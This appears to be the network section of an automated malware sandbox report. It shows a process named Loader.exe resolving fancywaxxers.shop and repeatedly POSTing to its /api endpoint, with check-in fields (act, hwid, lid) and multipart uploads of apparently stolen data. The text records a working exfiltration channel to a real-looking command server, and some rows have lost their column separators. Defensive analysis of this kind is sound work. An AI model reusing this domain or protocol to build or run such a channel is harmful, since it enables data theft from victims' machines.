Jan 1, 2025 02:56:58.179198027 CET | 443 | 49732 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:58.179287910 CET | 49732 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:58.179841995 CET | 49732 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:58.179852962 CET | 443 | 49732 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:58.723886967 CET | 443 | 49732 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:58.724004984 CET | 49732 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:58.725336075 CET | 49732 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:58.725344896 CET | 443 | 49732 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:58.725548983 CET | 443 | 49732 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:58.726732016 CET | 49732 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:58.726896048 CET | 49732 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:58.726926088 CET | 443 | 49732 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:58.726984978 CET | 49732 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:58.726990938 CET | 443 | 49732 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:59.323582888 CET | 443 | 49732 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:59.323676109 CET | 443 | 49732 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:59.323735952 CET | 49732 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:59.323946953 CET | 49732 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:59.323964119 CET | 443 | 49732 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:59.373073101 CET | 49733 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:59.373111010 CET | 443 | 49733 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:59.373202085 CET | 49733 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:59.373506069 CET | 49733 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:59.373521090 CET | 443 | 49733 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:59.827948093 CET | 443 | 49733 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:59.828043938 CET | 49733 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:59.829384089 CET | 49733 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:59.829392910 CET | 443 | 49733 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:59.829610109 CET | 443 | 49733 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:56:59.830872059 CET | 49733 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:59.830996037 CET | 49733 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:56:59.831026077 CET | 443 | 49733 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:00.384589911 CET | 443 | 49733 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:00.384706020 CET | 443 | 49733 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:00.384789944 CET | 49733 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:00.384967089 CET | 49733 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:00.384982109 CET | 443 | 49733 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:00.571120977 CET | 49734 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:00.571171999 CET | 443 | 49734 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:00.571249962 CET | 49734 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:00.601761103 CET | 49734 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:00.601780891 CET | 443 | 49734 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:01.065496922 CET | 443 | 49734 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:01.065589905 CET | 49734 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:01.078742981 CET | 49734 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:01.078754902 CET | 443 | 49734 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:01.079081059 CET | 443 | 49734 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:01.082881927 CET | 49734 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:01.086514950 CET | 49734 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:01.086564064 CET | 443 | 49734 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:01.086631060 CET | 49734 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:01.086639881 CET | 443 | 49734 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:01.582303047 CET | 443 | 49734 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:01.582418919 CET | 443 | 49734 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:01.582484007 CET | 49734 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:01.582593918 CET | 49734 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:01.582609892 CET | 443 | 49734 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:02.061391115 CET | 49735 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:02.061431885 CET | 443 | 49735 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:02.061521053 CET | 49735 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:02.061821938 CET | 49735 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:02.061836004 CET | 443 | 49735 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:02.521608114 CET | 443 | 49735 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:02.521703005 CET | 49735 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:02.522911072 CET | 49735 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:02.522917986 CET | 443 | 49735 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:02.523123980 CET | 443 | 49735 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:02.524277925 CET | 49735 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:02.524383068 CET | 49735 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:02.524394989 CET | 443 | 49735 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:03.258507013 CET | 443 | 49735 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:03.258589983 CET | 443 | 49735 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:03.258644104 CET | 49735 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:03.258840084 CET | 49735 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:03.258861065 CET | 443 | 49735 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:03.706300020 CET | 49736 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:03.706341982 CET | 443 | 49736 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:03.706425905 CET | 49736 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:03.706747055 CET | 49736 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:03.706767082 CET | 443 | 49736 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:04.160037994 CET | 443 | 49736 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:04.160116911 CET | 49736 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:04.204164982 CET | 49736 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:04.204186916 CET | 443 | 49736 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:04.204416990 CET | 443 | 49736 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:04.232280016 CET | 49736 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:04.233014107 CET | 49736 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:04.233050108 CET | 443 | 49736 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:04.233170033 CET | 49736 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:04.233203888 CET | 443 | 49736 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:04.233338118 CET | 49736 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:04.233382940 CET | 443 | 49736 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:04.233515978 CET | 49736 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:04.233546972 CET | 443 | 49736 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:04.233733892 CET | 49736 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:04.233771086 CET | 443 | 49736 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:04.233942032 CET | 49736 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:04.233969927 CET | 443 | 49736 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:04.233980894 CET | 49736 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:04.233999014 CET | 443 | 49736 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:04.234138012 CET | 49736 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:04.234160900 CET | 443 | 49736 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:04.234191895 CET | 49736 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:04.234333038 CET | 49736 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:04.234360933 CET | 49736 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:04.243324995 CET | 443 | 49736 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:04.243551970 CET | 49736 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:04.243587017 CET | 443 | 49736 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:04.243611097 CET | 49736 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:04.243632078 CET | 443 | 49736 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:04.243681908 CET | 49736 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:04.248636007 CET | 443 | 49736 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:05.835031986 CET | 443 | 49736 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:05.835115910 CET | 443 | 49736 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:05.835258007 CET | 49736 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:05.835381031 CET | 49736 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:05.835402012 CET | 443 | 49736 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:05.905159950 CET | 49737 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:05.905210018 CET | 443 | 49737 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:05.905293941 CET | 49737 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:05.905684948 CET | 49737 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:05.905697107 CET | 443 | 49737 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:06.388115883 CET | 443 | 49737 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:06.388204098 CET | 49737 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:06.389559031 CET | 49737 | 443 | 192.168.2.4 | 104.21.48.1
Jan 1, 2025 02:57:06.389576912 CET | 443 | 49737 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:06.389801025 CET | 443 | 49737 | 104.21.48.1 | 192.168.2.4
Jan 1, 2025 02:57:06.391045094 CET | 49737 | 443 | 192.168.2.4 | 104.21.48.1
                                                                                                Jan 1, 2025 02:57:06.391072989 CET49737443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:06.391115904 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.874170065 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.874213934 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.874244928 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.874278069 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.874283075 CET49737443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:06.874310017 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.874326944 CET49737443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:06.874357939 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.874391079 CET49737443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:06.874397993 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.874524117 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.874558926 CET49737443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:06.874561071 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.874574900 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.874610901 CET49737443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:06.874615908 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.878911972 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.878954887 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.879117012 CET49737443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:06.879251957 CET49737443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:06.879270077 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.879282951 CET49737443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:06.879290104 CET44349737104.21.48.1192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 1, 2025 02:56:55.706455946 CET | 61080 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 02:56:55.718822002 CET | 53 | 61080 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 1, 2025 02:56:55.706455946 CET | 192.168.2.4 | 1.1.1.1 | 0x78e1 | Standard query (0) | fancywaxxers.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 1, 2025 02:56:55.718822002 CET | 1.1.1.1 | 192.168.2.4 | 0x78e1 | No error (0) | fancywaxxers.shop | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 02:56:55.718822002 CET | 1.1.1.1 | 192.168.2.4 | 0x78e1 | No error (0) | fancywaxxers.shop | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 02:56:55.718822002 CET | 1.1.1.1 | 192.168.2.4 | 0x78e1 | No error (0) | fancywaxxers.shop | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 02:56:55.718822002 CET | 1.1.1.1 | 192.168.2.4 | 0x78e1 | No error (0) | fancywaxxers.shop | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 02:56:55.718822002 CET | 1.1.1.1 | 192.168.2.4 | 0x78e1 | No error (0) | fancywaxxers.shop | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 02:56:55.718822002 CET | 1.1.1.1 | 192.168.2.4 | 0x78e1 | No error (0) | fancywaxxers.shop | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 02:56:55.718822002 CET | 1.1.1.1 | 192.168.2.4 | 0x78e1 | No error (0) | fancywaxxers.shop | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
• fancywaxxers.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 104.21.48.1 | 443 | 2588 | C:\Users\user\Desktop\Loader.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 01:56:56 UTC | 264 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: fancywaxxers.shop
2025-01-01 01:56:56 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2025-01-01 01:56:56 UTC | 1131 | IN | HTTP/1.1 200 OK
Date: Wed, 01 Jan 2025 01:56:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=1rc1vt13moqgi6g80fabl6n9l7; expires=Sat, 26 Apr 2025 19:43:35 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KIR9xXx5YKRlV9DbHNWEKEozLZGFnO7uP9dmy2lbves9V5fOlilyW8rHTxE7I%2BQ%2FKXpkT%2FygTcyeVFfro9r4Vpa147tv6W9qDgmLge%2F8qciSXjOY9KD9FSoyk1gvF8PHrkDi0Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8faee54bd80143be-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1576&rtt_var=608&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=908&delivery_rate=1772920&cwnd=226&unsent_bytes=0&cid=bb90f9aeb0effe6d&ts=767&x=0"
2025-01-01 01:56:56 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2025-01-01 01:56:56 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 104.21.48.1 | 443 | 2588 | C:\Users\user\Desktop\Loader.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 01:56:57 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 52
Host: fancywaxxers.shop
2025-01-01 01:56:57 UTC | 52 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 35 32 34 37 39 35 30 39 34 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--6524795094&j=
2025-01-01 01:56:57 UTC | 1131 | IN | HTTP/1.1 200 OK
Date: Wed, 01 Jan 2025 01:56:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=jp22pdhu9fv9rqceg2qr5j1ibf; expires=Sat, 26 Apr 2025 19:43:36 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zk48mM4dBoJLSrn0772QWC5p6MrTNkac%2B2VxStR4VVZZlAIcuVd4QygeyX7AnA%2BV4aIGo8f46LmRatLVTAQLeGCTgyTIyoaUMVmy%2F6Pp4sSOooOHaGwjvoyQ%2B385CIF0xZSxGg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8faee5535f708c15-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1798&min_rtt=1789&rtt_var=689&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=953&delivery_rate=1567364&cwnd=238&unsent_bytes=0&cid=dfd301fc9ed53a47&ts=479&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 104.21.48.1 | 443 | 2588 | C:\Users\user\Desktop\Loader.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 01:56:58 UTC | 275 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=0N84MEPGBS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 18120
Host: fancywaxxers.shop
2025-01-01 01:56:58 UTC | 15331 | OUT | Data Ascii: --0N84MEPGBSContent-Disposition: form-data; name="hwid"2106D7020EE20555E1B71982A10B646A--0N84MEPGBSContent-Disposition: form-data; name="pid"2--0N84MEPGBSContent-Disposition: form-data; name="lid"yau6Na--6524795094--0N84MEPGBSCon
                                                                                                2025-01-01 01:56:59 UTC1143INHTTP/1.1 200 OK
                                                                                                Date: Wed, 01 Jan 2025 01:56:59 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=2oitio6aahq83vm6qhhj7o8etc; expires=Sat, 26 Apr 2025 19:43:38 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=al78%2FRZzJE3TLxt2DA%2BzVSy9qvCVk0kPuKo9OTqIcrTQo%2BpPQKrA3nVulMlzJpyIALJ6qWsr%2Fbzcri2xuAl8rVFnfVZktJQYEb%2BW80ALvE%2FFi56joEvc%2FbYzcuPi0%2FMGqcOTPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8faee55b5c98c323-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1481&min_rtt=1474&rtt_var=568&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2843&recv_bytes=19075&delivery_rate=1902280&cwnd=214&unsent_bytes=0&cid=19e50ddb760f9b83&ts=666&x=0"
                                                                                                2025-01-01 01:56:59 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                2025-01-01 01:56:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
3192.168.2.449733104.21.48.14432588C:\Users\user\Desktop\Loader.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 01:56:59 UTC | 274 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=OG750WXNTG
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8741
Host: fancywaxxers.shop
2025-01-01 01:56:59 UTC | 8741 | OUT | Data Raw: (hex dump omitted)
Data Ascii:
--OG750WXNTG
Content-Disposition: form-data; name="hwid"

2106D7020EE20555E1B71982A10B646A
--OG750WXNTG
Content-Disposition: form-data; name="pid"

2
--OG750WXNTG
Content-Disposition: form-data; name="lid"

yau6Na--6524795094
--OG750WXNTG
Con
2025-01-01 01:57:00 UTC | 1127 | IN | HTTP/1.1 200 OK
Date: Wed, 01 Jan 2025 01:57:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=6uuvi1jdta0uergiejjbjo7j93; expires=Sat, 26 Apr 2025 19:43:39 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M2XVbFOv1YJE6O46uam8hPLslH1x2hxsWViV6hAqWVDkxMktwYNaa6sJVxt6WY437QvZ1QSLRvxsHJ6D0RPaM7lfRQPcIpV8WvcoXWUHRIwncXnolMnelOHgj0%2B7cfRv49gcow%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8faee5624b158c15-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1788&rtt_var=680&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2842&recv_bytes=9673&delivery_rate=1599123&cwnd=238&unsent_bytes=0&cid=661be68bb5b61e2b&ts=561&x=0"
2025-01-01 01:57:00 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
f
ok 8.46.123.189
2025-01-01 01:57:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
4192.168.2.449734104.21.48.14432588C:\Users\user\Desktop\Loader.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 01:57:01 UTC | 278 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=XC0RK74IM4TDJ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20412
Host: fancywaxxers.shop
2025-01-01 01:57:01 UTC | 15331 | OUT | Data Raw: (hex dump omitted)
Data Ascii:
--XC0RK74IM4TDJ
Content-Disposition: form-data; name="hwid"

2106D7020EE20555E1B71982A10B646A
--XC0RK74IM4TDJ
Content-Disposition: form-data; name="pid"

3
--XC0RK74IM4TDJ
Content-Disposition: form-data; name="lid"

yau6Na--6524795094
--XC0RK7
2025-01-01 01:57:01 UTC | 5081 | OUT | Data Raw: (hex dump omitted)
Data Ascii: (non-printable binary payload omitted)
2025-01-01 01:57:01 UTC | 1131 | IN | HTTP/1.1 200 OK
Date: Wed, 01 Jan 2025 01:57:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ftl9jmtsl0a81r7p3s240oui9u; expires=Sat, 26 Apr 2025 19:43:40 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0EFSyPhydB1EKQj2NdqaAb5Wlp735YI2uGE77mwkjE%2FXuAAKl409VZQ65rSNjgUxEAndA6zwwm0E2va9cYCVLptvNsmE4swJ5UAHO6j9RP7e2DSDe%2BXHV0QoEcd6sXcaE4UY0A%3D%3D"}],"group":"cf-nel","max_age":604800}
